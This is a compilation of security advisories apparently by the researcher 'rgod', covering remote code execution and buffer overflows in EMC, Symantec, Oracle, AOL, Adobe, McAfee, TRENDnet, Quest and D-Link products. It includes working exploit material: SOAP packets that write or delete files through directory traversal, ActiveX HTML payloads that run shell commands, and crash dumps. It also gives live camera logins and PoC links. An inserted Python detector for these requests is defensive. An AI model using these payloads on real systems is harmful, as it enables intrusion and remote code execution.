EMC Data Protection Advisor DPA Illuminator EJBInvokerServlet Remote Code Execution
tested against:
  Microsoft Windows Server 2008 r2 sp1
  EMC Data Protection Advisor 5.8 sp5

vulnerability:
the DPA Illuminator service (DPA_Illuminator.exe) listening on public port 8090 (tcp/http) and 8453 (tcp/https) is vulnerable. It exposes the following servlet:

  http://[host]:8090/invoker/EJBInvokerServlet
  https://[host]:8453//invoker/EJBInvokerServlet

due to a bundled invoker.war. The result is remote code execution with NT AUTHORITY\SYSTEM privileges.

proof of concept url: http://retrogod.altervista.org/9sg_ejb.html

~rgod~
Symantec Workspace Streaming 7.5.0.493 SWS Streamlet Engine Invoker Servlets Remote Code Execution
tested against: Microsoft Windows Server 2008 R2 sp1
download url: http://www.symantec.com/it/it/products-solutions/trialware/
file tested: Symantec_Workspace_Streaming_7.5.0.493.zip

vulnerability:
the SWS Streamlet Engine service (as_ste.exe) listening on public port 9832 (tcp/http) is vulnerable. It exposes the following servlets:

  http://[host]:9832/invoker/EJBInvokerServlet
  http://[host]:9832/invoker/JMXInvokerServlet

due to a bundled invoker.sar. The result is remote code execution with NT AUTHORITY\SYSTEM privileges.

proof of concept url: http://retrogod.altervista.org/9sg_ejb.html

~rgod~
Borland Caliber 11.0 Quiksoft EasyMail SMTP Object Buffer Overflows
ActiveX settings:
  Binary path: C:\Program Files (x86)\Borland\CaliberRM\emsmtp.dll
  Version: 5.0.0.11
  ProgID: EasyMail.SMTP.5
  CLSID: {4610E7BF-710F-11D3-813D-00C04F6B92D0}
  Safe for Scripting: True
  Safe for Initialization: True

The SubmitToExpress and AddAttachment methods are vulnerable; see CVE-2007-4607 and CVE-2009-4663.

//rgod
Borland Silk Central 12.1 TeeChart Pro Activex control AddSeries Remote Code Execution
ActiveX Settings:
  Binary path: C:\Program Files\Silk\Shared Files\teechart.ocx
  CLSID: {008BBE7E-C096-11D0-B4E3-00A0C901D681}
  ProgID: TeeChart.TChart
  Version: 4.0.0.7
  Safe for Scripting (IObjectSafety): True
  Safe for Initialization (IObjectSafety): True

The AddSeries method is vulnerable, see http://www.osvdb.org/show/osvdb/74446

//rgod
Oracle Business Transaction Management Server FlashTunnelService WriteToFile Message Remote Code Execution
Oracle Business Transaction Management Server 12.1.0.2.7 FlashTunnelService WriteToFile Message Remote Code Execution Exploit

tested against:
  Microsoft Windows Server 2003 r2 sp2
  Oracle WebLogic Server 12c (12.1.1)
  Oracle Business Transaction Management Server 12.1.0.2.7 (Production version)

files tested:
  oepe-indigo-installer-12.1.1.0.1.201203120349-12.1.1-win32.exe (weblogic)
  download url: http://www.oracle.com/technetwork/middleware/weblogic/downloads/index.html
  BTM_Servers_12.1.0.2.7.zip (BTM, production version)
  download url: http://www.oracle.com/technetwork/oem/downloads/btw-downloads-207704.html

vulnerability:
the mentioned product installs a web service called FlashTunnelService which can be reached without prior authentication and processes incoming SOAP requests. It can be reached at the following uri:

  http://[host]:7001/btmui/soa/flash_svc/

This soap interface exposes the writeToFile function, which allows writing arbitrary files on the target server. Example packet:

..
POST /btmui/soa/flash_svc/ HTTP/1.1
Accept-Encoding: gzip,deflate
Content-Type: text/xml;charset=UTF-8
SOAPAction: "http://soa.amberpoint.com/writeToFile"
User-Agent: Jakarta Commons-HttpClient/3.1
Host: 192.168.0.1:7001
Content-Length: [length]

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:int="http://schemas.amberpoint.com/flashtunnel/interfaces" xmlns:typ="http://schemas.amberpoint.com/flashtunnel/types">
   <soapenv:Header/>
   <soapenv:Body>
      <int:writeToFileRequest>
         <int:writeToFile handle="..\..\..\..\..\..\..\..\[path]\somefile.jsp">
            <!--Zero or more repetitions:-->
            <typ:text>[code]</typ:text>
            <!--Optional:-->
            <typ:WriteToFileRequestVersion>
               <!--You may enter ANY elements at this point-->
            </typ:WriteToFileRequestVersion>
         </int:writeToFile>
      </int:writeToFileRequest>
   </soapenv:Body>
</soapenv:Envelope>
..

The 'handle' property controls the location of the newly written file (it suffers from a directory traversal vulnerability). The file extension can also be controlled. File content can be controlled through the 'text' element (note that one must first convert the code to html entities; the soap interface converts it back to its original format). Given this, a remote attacker could place an arbitrary jsp script inside the main web server root path, then execute arbitrary code with the privileges of the weblogic installation (usually Administrator privileges).

vulnerable code, see the decompiled com.amberpoint.flashtunnel.impl.FlashTunnelServiceImpl.class:

..
public IWriteToFileResponse writeToFile(IWriteToFileRequest request) throws SOAPFaultException {
    WriteToFileResponse wtfr = new WriteToFileResponse();
    String handle = request.getHandle();
    TypedList text = request.getText();
    if (text != null && text.size() > 0) {
        // the request-supplied handle is turned into a File as-is (the '..\' sequences above are honoured)
        File f = getFileFromHandle(handle);
        if (f != null)
            try {
                FileOutputStream fos = new FileOutputStream(f);
                OutputStreamWriter osw = new OutputStreamWriter(fos, "UTF-8");
                int i = 0;
                // each <text> element becomes one line of the new file
                for (int ii = text.size(); i < ii; i++) {
                    String s = (String) text.get(i);
                    osw.write(s);
                    osw.write("\n");
                }
                osw.close();
            } catch (IOException ex) {
                logger.log(Level.SEVERE, (new StringBuilder()).append("IOException writing '").append(f.toString()).append("': ").append(ex.getMessage()).toString());
            }
    }
    return wtfr;
}
..

As attachment, proof of concept code written in php; launch from the command line, modify for your own use.

poc: http://retrogod.altervista.org/9sg_ora.htm

rgod
Oracle Business Transaction Management Server FlashTunnelService Remote File Deletion
Oracle Business Transaction Management Server 12.1.0.2.7 FlashTunnelService Remote File Deletion

tested against:
  Microsoft Windows Server 2003 r2 sp2
  Oracle WebLogic Server 12c (12.1.1)
  Oracle Business Transaction Management Server 12.1.0.2.7 (Production version)

files tested:
  oepe-indigo-installer-12.1.1.0.1.201203120349-12.1.1-win32.exe (weblogic)
  download url: http://www.oracle.com/technetwork/middleware/weblogic/downloads/index.html
  BTM_Servers_12.1.0.2.7.zip (BTM, production version)
  download url: http://www.oracle.com/technetwork/oem/downloads/btw-downloads-207704.html

vulnerability:
the mentioned product installs a web service called FlashTunnelService which can be reached without prior authentication and processes incoming SOAP requests. It can be reached at the following uri:

  http://[host]:7001/btmui/soa/flash_svc/

This soap interface exposes the 'deleteFile' function, which allows deleting arbitrary files with administrative privileges on the target server through a directory traversal vulnerability. This could be useful for further attacks. Example packet:

..
POST /btmui/soa/flash_svc/ HTTP/1.1
Accept-Encoding: gzip,deflate
Content-Type: text/xml;charset=UTF-8
SOAPAction: "http://soa.amberpoint.com/deleteFile"
User-Agent: Jakarta Commons-HttpClient/3.1
Host: [host]:7001
Content-Length: [length]

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:int="http://schemas.amberpoint.com/flashtunnel/interfaces" xmlns:typ="http://schemas.amberpoint.com/flashtunnel/types">
   <soapenv:Header/>
   <soapenv:Body>
      <int:deleteFileRequest>
         <int:deleteFile handle="../../../../../../../../../../../../somepath/somefile.ext">
            <typ:DeleteFileRequestVersion>
            </typ:DeleteFileRequestVersion>
         </int:deleteFile>
      </int:deleteFileRequest>
   </soapenv:Body>
</soapenv:Envelope>
..

Vulnerable code, see the decompiled com.amberpoint.flashtunnel.impl.FlashTunnelServiceImpl class:

..
public IDeleteFileResponse deleteFile(IDeleteFileRequest request) throws SOAPFaultException {
    DeleteFileResponse dfr = new DeleteFileResponse();
    String handle = request.getHandle();
    // the request-supplied handle becomes a File and is deleted with no further check
    File f = getFileFromHandle(handle);
    if (f != null)
        f.delete();
    return dfr;
}
..

As attachment, proof of concept code.

poc: http://retrogod.altervista.org/9sg_ora2.htm

rgod
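The two FlashTunnelService advisories above and the two invoker-servlet advisories at the top of this page describe requests that can be recognised on the wire. The following Python is an added example, not part of rgod's advisories or of the affected products: it classifies HTTP requests by the request paths, SOAPAction values and handle attribute documented above, and flags a bare ".." segment in the handle after undoing URL and XML-entity encoding. The HttpRequest model and the sample requests are constructed for the example and modelled on the packets shown above.

```python
import re
from dataclasses import dataclass, field
from html import unescape
from urllib.parse import unquote

# Request paths named in the advisories above
INVOKER_RE = re.compile(r"^/invoker/(?:EJB|JMX)InvokerServlet/?$", re.IGNORECASE)
FLASH_SVC_PATH = "/btmui/soa/flash_svc/"
# SOAP operations the FlashTunnelService exposes according to the advisories
FLASH_OPS = ("writeToFile", "deleteFile")
# handle="..." attribute of the writeToFile / deleteFile element
HANDLE_RE = re.compile(r'\bhandle\s*=\s*"([^"]*)"', re.IGNORECASE)
# a bare ".." path segment with either separator style, at start, middle or end
TRAVERSAL_RE = re.compile(r"(?:^|[\\/])\.\.(?:[\\/]|$)")


@dataclass
class HttpRequest:
    """Minimal request model (constructed for this example)."""
    method: str
    path: str
    headers: dict = field(default_factory=dict)
    body: str = ""

    def header(self, name):
        """Case-insensitive header lookup; '' when absent."""
        for key, value in self.headers.items():
            if key.lower() == name.lower():
                return value
        return ""


def classify(req):
    """Return the detection tags that apply to one request (empty list = nothing of note)."""
    tags = []
    # collapse doubled slashes (the DPA advisory shows '//invoker/...') and drop any query string
    path = re.sub(r"/+", "/", req.path.split("?", 1)[0])
    if INVOKER_RE.match(path):
        # invoker.war / invoker.sar should not be reachable from untrusted networks at all
        tags.append("jboss-invoker-servlet")
    if path == FLASH_SVC_PATH:
        action = req.header("SOAPAction").strip().strip('"')
        op = action.rsplit("/", 1)[-1]
        if op in FLASH_OPS:
            tags.append("flashtunnel-" + op)
        m = HANDLE_RE.search(req.body)
        if m:
            # undo both URL-encoding and XML/HTML entity encoding before looking for '..'
            handle = unescape(unquote(m.group(1)))
            if TRAVERSAL_RE.search(handle):
                tags.append("flashtunnel-handle-traversal")
    return tags


def scan(requests):
    """Run classify() over a batch; return (index, tags) only for requests that produced tags."""
    return [(idx, tags) for idx, req in enumerate(requests) if (tags := classify(req))]


# Constructed sample traffic modelled on the packets shown in the advisories
SAMPLE_REQUESTS = [
    HttpRequest("POST", "/invoker/EJBInvokerServlet"),
    HttpRequest("POST", "//invoker/JMXInvokerServlet"),
    HttpRequest(
        "POST", FLASH_SVC_PATH,
        {"SOAPAction": '"http://soa.amberpoint.com/writeToFile"', "Content-Type": "text/xml;charset=UTF-8"},
        '<int:writeToFile handle="..\\..\\..\\..\\..\\..\\..\\..\\[path]\\somefile.jsp"><typ:text>x</typ:text></int:writeToFile>',
    ),
    HttpRequest(
        "POST", FLASH_SVC_PATH,
        {"soapaction": '"http://soa.amberpoint.com/deleteFile"'},
        '<int:deleteFile handle="reports\\job42.tmp"/>',
    ),
    HttpRequest("GET", "/btmui/"),
]

if __name__ == "__main__":
    for idx, tags in scan(SAMPLE_REQUESTS):
        print(idx, SAMPLE_REQUESTS[idx].path, tags)
```

The invoker-servlet tag fires on the path alone: the advisories describe no legitimate remote use of those servlets, so any hit is worth reviewing. The FlashTunnelService tags separate "the operation was invoked" from "the handle climbs out of a directory", since a benign handle such as reports\job42.tmp still deserves an audit trail.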
AOL Products downloadUpdater2 Plugin SRC Parameter Remote Code Execution
tested against:
  Microsoft Windows Vista sp2
  Microsoft Windows Server 2003 r2 sp2
  Mozilla Firefox 14.0.1

download url: http://client.web.aol.com/toolbarfiles/Prod/downloads/downloadupdater/dnupdatersetup.exe
(this was the update for a previous vulnerability, see ZDI-12-098)
see also the installer aol_toolbar_pricecheck.exe
url: http://toolbar.aol.com/download_files/download-helper.html?brand=aol&a=111&ncid=txtlnkusdown0043

vulnerability:
the mentioned product installs a Firefox plugin:
  File: npdnupdater2.dll
  Version: 1.3.0.0
  Name: npdnupdater2
  Path: C:\Program Files\Mozilla Firefox\plugins\npdnupdater2.dll
  Mime type: applicatiotn/x-vend.aol.dnupdater2.1
  Extension: ocp

By embedding this plugin inside an html page it is possible to trigger a buffer overflow vulnerability through the 'SRC' parameter. Example crash:

..
EAX
ECX 01101470
EDX 01135208 ASCII
EBX
ESP 0013F618
EBP 0013F634
ESI 0002
EDI 0013F668
EIP 61616161
C 1  ES 0023 32bit 0()
P 1  CS 001B 32bit 0()
A 1  SS 0023 32bit 0()
Z 0  DS 0023 32bit 0()
S 1  FS 003B 32bit 7FFDD000(4000)
T 0  GS NULL
D 0
O 0  LastErr ERROR_SUCCESS
EFL 0297 (NO,B,NE,BE,S,PE,L,LE)
ST0 empty 0.0
ST1 empty 0.0
ST2 empty 0.0
ST3 empty 0.0
ST4 empty 0.0
ST5 empty 0.0
ST6 empty 8.000
ST7 empty 0.250  CONST 1/4.
               3 2 1 0      E S P U O Z D I
FST 0120  Cond 0 0 0 1  Err 0 0 1 0 0 0 0 0  (LT)
FCW 027F  Prec NEAR,53  Mask    1 1 1 1 1 1
Last cmnd 001B:10571FBD xul.10571FBD
XMM0
XMM1 61616161 61616161 61616161 61616161
XMM2 61616161 61616161 61616161 61616161
XMM3 61616161 61616161 61616161 61616161
XMM4 61616161 61616161 61616161 61616161
XMM5 61616161 61616161 61616161 61616161
XMM6 61616161 61616161 61616161 61616161
XMM7 61616161 61616161 61616161 61616161
               P U O Z D I
MXCSR 1F80  FZ 0 DZ 0  Err 0 0 0 0 0 0
            Rnd NEAR  Mask 1 1 1 1 1 1
..

EIP is overwritten, and EDX also points to user-supplied code (this can be done by setting an overlong fake parameter, see poc). As attachment, proof of concept code.

A copy loop [*] is involved in overwriting a certain memory region. The subsequent code can be used to call inside this memory region [**]. See npdnupdater2.dll:

..
CPU Disasm
Address   Hex dump          Command                                  Comments
01A91C10  /$ 55             PUSH EBP                                 ; npdnupdater2.01A91C10(guessed Arg1)
01A91C11  |. 56             PUSH ESI
01A91C12  |. 8BE9           MOV EBP,ECX
01A91C14  |. 57             PUSH EDI
01A91C15  |. 8B7C24 10      MOV EDI,DWORD PTR SS:[ARG.1]
01A91C19  |. C745 00 9CA2A  MOV DWORD PTR SS:[EBP],OFFSET 01A9A29C
01A91C20  |. 8B07           MOV EAX,DWORD PTR DS:[EDI]
01A91C22  |. 33F6           XOR ESI,ESI
01A91C24  |. 8945 04        MOV DWORD PTR SS:[EBP+4],EAX
01A91C27  |. C645 08 00     MOV BYTE PTR SS:[EBP+8],0
01A91C2B  |. C745 10 0      MOV DWORD PTR SS:[EBP+10],0
01A91C32  |. 66:3977 0A     CMP WORD PTR DS:[EDI+0A],SI
01A91C36  |. 7E 3E          JLE SHORT 01A91C76
01A91C38  |. EB 06          JMP SHORT 01A91C40
01A91C3A  |  8D9B           LEA EBX,[EBX]
01A91C40  |  8B4F 0C        /MOV ECX,DWORD PTR DS:[EDI+0C]
01A91C43  |. 8B14B1         |MOV EDX,DWORD PTR DS:[ESI*4+ECX]
01A91C46  |. 68 D4A2A901    |PUSH OFFSET 01A9A2D4                    ; /Arg2 = ASCII "SRC"
01A91C4B  |. 52             |PUSH EDX                                ; |Arg1
01A91C4C  |. E8 E06F        |CALL 01A98C31                           ; \npdnupdater2.01A98C31
01A91C51  |. 83C4 08        |ADD ESP,8
01A91C54  |. 85C0           |TEST EAX,EAX
01A91C56  |. 75 15          |JNE SHORT 01A91C6D
01A91C58  |. 8B47 10        |MOV EAX,DWORD PTR DS:[EDI+10]
01A91C5B  |. 8B0CB0         |MOV ECX,DWORD PTR DS:[ESI*4+EAX]
01A91C5E  |. BA 38CCA901    |MOV EDX,OFFSET 01A9CC38                 ; ASCII ...
01A91C63  |  8A01           |/MOV AL,BYTE PTR DS:[ECX]               ; [*]
01A91C65  |. 41             ||INC ECX
01A91C66  |. 8802           ||MOV BYTE PTR DS:[EDX],AL
01A91C68  |. 42             ||INC EDX
01A91C69  |. 84C0           ||TEST AL,AL
01A91C6B  |.^ 75 F6         |\JNE SHORT 01A91C63
01A91C6D  |  0FBF4F 0A      |MOVSX ECX,WORD PTR DS:[EDI+0A]
01A91C71  |. 46             |INC ESI
01A91C72  |. 3BF1           |CMP ESI,ECX
01A91C74  |.^ 7C CA         \JL SHORT 01A91C40
01A91C76  |  5F             POP EDI
01A91C77  |. 5E             POP ESI
01A91C78  |. 8BC5           MOV EAX,EBP
01A91C7A  |. 5D             POP EBP
01A91C7B  \. C2 0400        RETN 4
01A91C7E     CC             INT3
..
Adobe Photoshop CS5.1 U3D.8BI Library Collada Asset Elements Stack Based Buffer Overflow Vulnerability
download url of a test version: http://www.adobe.com/cfusion/tdrc/index.cfm?product=photoshop

Note: Found three weeks before the CS6 release. I could not reproduce against CS6, cannot say if there is a CVE for this, I think it is also possible they patched silently. However this leaves a lot of Photoshop installations vulnerable.

vulnerability:
A buffer overflow exists in the way Photoshop parses Collada (*.DAE) asset elements. Example file:

..
<?xml version="1.0"?>
<COLLADA xmlns="http://www.collada.org/2005/11/COLLADASchema" version="1.4.1">
  <asset>
    <contributor>
      <author>rgod</author>
      <authoring_tool>Maya 8.0 | ColladaMaya v3.02 | FCollada v3.2</authoring_tool>
      <comments>Collada Maya Export Options: bakeTransforms=0;exportPolygonMeshes=1;bakeLighting=0;isSampling=0;
      curveConstrainSampling=0;exportCameraAsLookat=0;
      exportLights=1;exportCameras=1;exportJointsAndSkin=1;
      exportAnimations=1;exportTriangles=1;exportInvisibleNodes=0;
      exportNormals=1;exportTexCoords=1;exportVertexColors=1;exportTangents=0;
      exportTexTangents=0;exportConstraints=1;exportPhysics=0;exportXRefs=1;
      dereferenceXRefs=0;cameraXFov=0;cameraYFov=1...</comments>
..

While trying to convert the element field from ASCII to Unicode, the U3D.8BI library plugin miscalculates the size of the buffer it allocates for the user-supplied string, then overwrites the stack with the user-controlled buffer. Critical structures are overwritten (SEH); the arguments of a subsequent memcpy() are also user-controlled.

vulnerable code, these routines in u3d.8bi (this is repeated once for each byte of the string), run trace:

..
10A05C30  55               push ebp
10A05C31  8BEC             mov ebp, esp
10A05C33  83EC 10          sub esp, 10
10A05C36  8B45 08          mov eax, dword ptr ss:[ebp+8]
10A05C39  0345 0C          add eax, dword ptr ss:[ebp+C]
10A05C3C  8945 F8          mov dword ptr ss:[ebp-8], eax
10A05C3F  8B4D 0C          mov ecx, dword ptr ss:[ebp+C]
10A05C42  894D F4          mov dword ptr ss:[ebp-C], ecx
10A05C45  8B55 F4          mov edx, dword ptr ss:[ebp-C]
10A05C48  83EA 01          sub edx, 1
10A05C4B  8955 F4          mov dword ptr ss:[ebp-C], edx
10A05C4E  837D F4 03       cmp dword ptr ss:[ebp-C], 3
10A05C52  77 0A            ja short U3D.10A05C5E
10A05C54  8B45 F4          mov eax, dword ptr ss:[ebp-C]
10A05C57  FF2485 A45DA010  jmp dword ptr ds:[eax*4+10A05DA4]
..
..
10A05D6A  8B4D 08          mov ecx, dword ptr ss:[ebp+8]
10A05D6D  0FB611           movzx edx, byte ptr ds:[ecx]
10A05D70  81FA 8000        cmp edx, 80
10A05D76  7C 12            jl short U3D.10A05D8A
10A05D78  8B45 08          mov eax, dword ptr ss:[ebp+8]
10A05D7B  0FB608           movzx ecx, byte ptr ds:[eax]
10A05D7E  81F9 C200        cmp ecx, 0C2
10A05D84  7D 04            jge short U3D.10A05D8A
10A05D86  32C0             xor al, al
10A05D88  EB 13            jmp short U3D.10A05D9D
10A05D8A  8B55 08          mov edx, dword ptr ss:[ebp+8]
10A05D8D  0FB602           movzx eax, byte ptr ds:[edx]
10A05D90  3D F400          cmp eax, 0F4
10A05D95  7E 04            jle short U3D.10A05D9B
10A05D97  32C0             xor al, al
10A05D99  EB 02            jmp short U3D.10A05D9D
10A05D9B  B0 01            mov al, 1
10A05D9D  8BE5             mov esp, ebp
10A05D9F  5D               pop ebp
10A05DA0  C3               retn
..
..
10A05E4B  83C4 08          add esp, 8
10A05E4E  0FB6D0           movzx edx, al
10A05E51  85D2             test edx, edx
10A05E53  75 0C            jnz short U3D.10A05E61
10A05E55  C745 F8 0300     mov dword ptr ss:[ebp-8], 3
10A05E5C  E9 1502          jmp U3D.10A06076
10A05E61  0FB745 F0        movzx eax, word ptr ss:[ebp-10]
10A05E65  8945 E8          mov dword ptr ss:[ebp-18], eax
10A05E68  837D E8 05       cmp dword ptr ss:[ebp-18], 5
10A05E6C  0F87 B500        ja U3D.10A05F27
10A05E72  8B4D E8          mov ecx, dword ptr ss:[ebp-18]
10A05E75  FF248D 9060A010  jmp dword ptr ds:[ecx*4+10A06090]
..
..
10A05F12  8B4D F4          mov ecx, dword ptr ss:[ebp-C]
10A05F15  0FB611           movzx edx, byte ptr ds:[ecx]
10A05F18  0355 EC          add edx, dword ptr ss:[ebp-14]
10A05F1B  8955 EC          mov dword ptr ss:[ebp-14], edx
10A05F1E  8B45 F4          mov eax, dword ptr ss:[ebp-C]
10A05F21  83C0 01          add eax, 1
10A05F24  8945 F4          mov dword ptr ss:[ebp-C], eax
10A05F27  0FB74D F0        movzx ecx, word ptr ss:[ebp-10]
10A05F2B  8B55 EC          mov edx, dword ptr ss:[ebp-14]
10A05F2E  2B148D 5034B110  sub edx, dword ptr ds:[ecx*4+10B1345
10A05F35  8955 EC          mov
McAfee Virtual Technician 6.3.0.1911 MVT.MVTControl.6300 ActiveX Control GetObject() Security Bypass Remote Code Execution Vulnerability
tested against:
  Microsoft Windows Vista sp2
  Microsoft Windows 2003 r2 sp2
  Internet Explorer 7/8/9

product homepage: http://www.mcafee.com/it/downloads/free-tools/virtual-technician.aspx
file tested: MVTInstaller.exe

background:
the mentioned product installs an ActiveX control with the following settings:
  Binary path: C:\Program Files\McAfee\Supportability\MVT\MVT.dll
  ProgID: MVT.MVTControl.6300
  CLSID: {2EBE1406-BE0E-44E6-AE10-247A0C5AEDCF}
  Implements IObjectSafety: Yes
  Safe for Scripting (IObjectSafety): true
  Safe for Initialization (IObjectSafety): false

According to the IObjectSafety interface this control is safe for scripting, so Internet Explorer will allow scripting it from remote.

Vulnerability:
this control offers the vulnerable GetObject() function, see typelib:

..
/* DISPID=3 */
/* VT_VARIANT [12] */
function GetObject(
    /* VT_VARIANT [12] [in] */ $in_dwObjectID
) {
    /* method GetObject */
}
..

By specifying the ProgID of an arbitrary class from the underlying operating system, with no regard for browser security, it is possible to load e.g. the WScript.Shell class. The returned object then offers the Exec() method, which can be used to launch operating system commands.

Example of attack:

..
<object classid='clsid:2EBE1406-BE0E-44E6-AE10-247A0C5AEDCF' id='obj'></object>
<script defer="defer">
var x = obj.GetObject("WScript.Shell");
x.Exec("cmd /c start calc");
</script>
..

It is also possible to crash the browser by specifying an arbitrary memory address:

..
<object classid='clsid:2EBE1406-BE0E-44E6-AE10-247A0C5AEDCF' id='obj'></object>
<script defer="defer">
var x = obj.GetObject(0x0c0c0c0c);
</script>
..

example crash:

..
eax=0c0c0c0c ebx=0197085c ecx=01b5efec edx=008e esi=01b5efec edi=01b5f344
eip=77bd8efa esp=01b5ef80 ebp=01b5ef80 iopl=0         nv up ei pl nz na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=             efl=00010206
msvcrt!wcslen+0x8:
77bd8efa 668b08          mov     cx,word ptr [eax]        ds:0023:0c0c0c0c=
..

The debugger shows an access violation while reading 0x0c0c0c0c; this could also be exploitable but was not demonstrated at the time of this report.

As attachment, proof of concept code which executes calc.exe, then crashes IE.

additional note:

..
0:010> lm -vm mvt
start    end        module name
0345     034b8000   MVT        (deferred)
    Image path: D:\Program Files\McAfee\Supportability\MVT\MVT.dll
    Image name: MVT.dll
    Timestamp:        Thu Jan 12 07:37:26 2012 (4F0E7FA6)
    CheckSum:         0006C308
    ImageSize:        00068000
    File version:     6.3.0.1911
    Product version:  6.3.0.1911
    File flags:       0 (Mask 3F)
    File OS:          4 Unknown Win32
    File type:        2.0 Dll
    File date:        .
    Translations:     0409.04e4
    CompanyName:      McAfee, Inc.
    ProductName:      McAfee Virtual Technician
    InternalName:     MVT.dll
    OriginalFilename: MVT.dll
    ProductVersion:   6.3.0.1911
    FileVersion:      6.3.0.1911
    FileDescription:  McAfee, Inc.
    LegalCopyright:   ©2011 McAfee, Inc. All Rights Reserved.
..

//rgod

original url: http://retrogod.altervista.org/9sg_mcafee_vt_adv.htm
poc: http://retrogod.altervista.org/9sg_mcafee_vt_ax.htm
TRENDnet SecurView TV-IP121WN Wireless Internet Camera UltraMJCam ActiveX Control OpenFileDlg WideCharToMultiByte Remote Stack Buffer Overflow
camera demo: http://67.203.184.58:9193/admin/view.cgi?profile=0
  username=guest password=guest

Background:
The mentioned product, when browsing the device web interface, asks to install an ActiveX control to stream video content. It has the following settings:
  File version: 1, 1, 52, 18
  Product name: UltraMJCam device ActiveX Control
  Binary path: C:\WINDOWS\Downloaded Program Files\UltraMJCamX.ocx
  ProgID: UltraMJCam.UltraMJCam.1
  CLSID: {707ABFC2-1D27-4a10-A6E4-6BE6BDF9FB11}
  Implements IObjectSafety: yes
  Safe for Scripting (IObjectSafety): True
  Safe for Initialization (IObjectSafety): True

Vulnerability:
This ActiveX control exposes the vulnerable OpenFileDlg() method, see typelib:

..
/* DISPID=101 */
/* VT_BSTR [8] */
function OpenFileDlg(
    /* VT_BSTR [8] [in] */ $sFilter
) {
    /* method OpenFileDlg */
}
..

By invoking this method with an overlong argument it is possible to overflow a buffer. This is because of an insecure WideCharToMultiByte() call inside UltraMJCamX.ocx:

..
Call stack of main thread
Address   Stack     Procedure / arguments                 Called from           Frame
001279FC  77E6F20B  kernel32.77E637DE                     kernel32.77E6F206     00127A0C
00127A10  0299F958  kernel32.WideCharToMultiByte          UltraMJC.0299F952     00127A0C
00127A14  0003      CodePage = 3
00127A18            Options = 0
00127A1C  03835C5C  WideCharStr =
00127A20            WideCharCount = (-1.)
00127A24  00127A50  MultiByteStr = 00127A50
00127A28  7532      MultiByteCount = 7532 (30002.)
00127A2C            pDefaultChar = NULL
00127A30            pDefaultCharUsed = NULL
00127A3C  029B11D0  UltraMJC.0299F920                     UltraMJC.029B11CB     00127A38
..

..
0299F934  8B45 08          mov eax,dword ptr ss:[ebp+8]
0299F937  C600 00          mov byte ptr ds:[eax],0
0299F93A  6A 00            push 0
0299F93C  6A 00            push 0
0299F93E  8B4D 10          mov ecx,dword ptr ss:[ebp+10]
0299F941  51               push ecx
0299F942  8B55 08          mov edx,dword ptr ss:[ebp+8]
0299F945  52               push edx
0299F946  6A FF            push -1
0299F948  8B45 0C          mov eax,dword ptr ss:[ebp+C]
0299F94B  50               push eax
0299F94C  6A 00            push 0
0299F94E  8B4D 14          mov ecx,dword ptr ss:[ebp+14]
0299F951  51               push ecx
0299F952  FF15 20319F02    call dword ptr ds:[<&KERNEL32.WideCharToMultiByte>] ; kernel32.WideCharToMultiByte
..

The result is that critical structures are overwritten (SEH), allowing execution of arbitrary code against the target browser.

As attachment, basic proof of concept code.

original url: http://retrogod.altervista.org/9sg_trendnet_adv.htm
poc: http://retrogod.altervista.org/9sg_trendnet_poc.htm
Quest InTrust 10.4.x Annotation Objects ActiveX Control AnnotateX.dll Uninitialized Pointer Remote Code Execution
homepage: http://www.quest.com/intrust/

description: InTrust securely collects, stores, reports and alerts on event log data from Windows, Unix and Linux systems, helping you comply with external regulations, internal policies and security best practices.

download url of a test version: http://www.quest.com/downloads/
file tested: Quest_InTrust---Full-Package_104.zip

Background:
The mentioned product installs an ActiveX control with the following settings:
  binary path: C:\PROGRA~1\COMMON~1\SOFTWA~1\ANNOTA~1.DLL
  CLSID: {EF600D71-358F-11D1-8FD4-00AA00BD091C}
  ProgID: AnnotationX.AnnList.1
  Implements IObjectSafety: Yes
  Safe for Scripting (IObjectSafety): True
  Safe for Initialization (IObjectSafety): True

According to the IObjectSafety interface it is safe for scripting and safe for initialization, so Internet Explorer will allow scripting of this control from remote.

Vulnerability:
By invoking the Add() method it is possible to call into a memory region of choice set by the attacker through e.g. heap spray or other techniques. Example code:

..
<object classid='clsid:EF600D71-358F-11D1-8FD4-00AA00BD091C' id='obj'></object>
<script>
obj.Add(0x76767676,1);
</script>
..

..
eax=76767676 ebx=4401e51c ecx=01f85340 edx=         esi=01f85340 edi=0001
eip=4400ae62 esp=015fd134 ebp=015fd140 iopl=0         nv up ei pl nz na po nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=             efl=00010202
ANNOTA_1+0xae62:
4400ae62 ff1485504a0244  call    dword ptr ANNOTA_1!DllUnregisterServer+0x19235 (44024a50)[eax*4]  ds:0023:1ddc2428=
..

You are in control of eax: fully exploitable.

As attachment, proof of concept code.

original url: http://retrogod.altervista.org/9sg_quest_adv.htm
poc: http://retrogod.altervista.org/9sg_quest_poc.htm
D-Link SecuriCam DCS-5605 Network Surveillance ActiveX Control DcsCliCtrl.dll lstrcpyW Remote Buffer Overflow Vulnerability
tested against:
  Microsoft Windows Server 2003 r2 sp2
  Internet Explorer 7/8

Live demo: http://203.125.227.70/eng/index.cgi
  username: dlink password: dlink

product homepage: http://www.d-link.com/products/?pid=771

product description: The DCS-5605 is a high performance camera for professional surveillance and remote monitoring. This network camera features motorized pan, tilt, and optical/digital zoom for ultimate versatility. The 10x optical zoom lens delivers the level of detail necessary to identify faces, license plate numbers, and other important details that are difficult to clearly distinguish using digital zoom alone.

background:
When browsing the device web interface, the user is asked to install an ActiveX control to stream video content. This control has the following settings:
  Description: Camera Stream Client Control
  File version: 1.0.0.4519
  Binary path: C:\Program Files\NetworkSurveillanceAX\DcsCliCtrl.dll
  ProgID: DcsCliCtrl.DCSStrmControl.1
  GUID: {721700FE-7F0E-49C5-BDED-CA92B7CB1245}
  Implements IObjectSafety: Yes
  Safe For Scripting (IObjectSafety): True
  Safe For Initialization (IObjectSafety): True

Vulnerability:
the ActiveX control exposes the SelectDirectory() method, which supports one optional argument. See typelib:

..
/* DISPID=22 */
/* VT_BSTR [8] */
function SelectDirectory(
    /* VT_VARIANT [12] [in] */ $varDefPath
) {
    /* method SelectDirectory */
}
..

This method suffers from a stack based buffer overflow vulnerability because of an unsafe lstrcpyW() call inside DcsCliCtrl.dll:

..
100712E0  81EC 3404        sub esp,434
100712E6  A1 2C841010      mov eax,dword ptr ds:[1010842C]
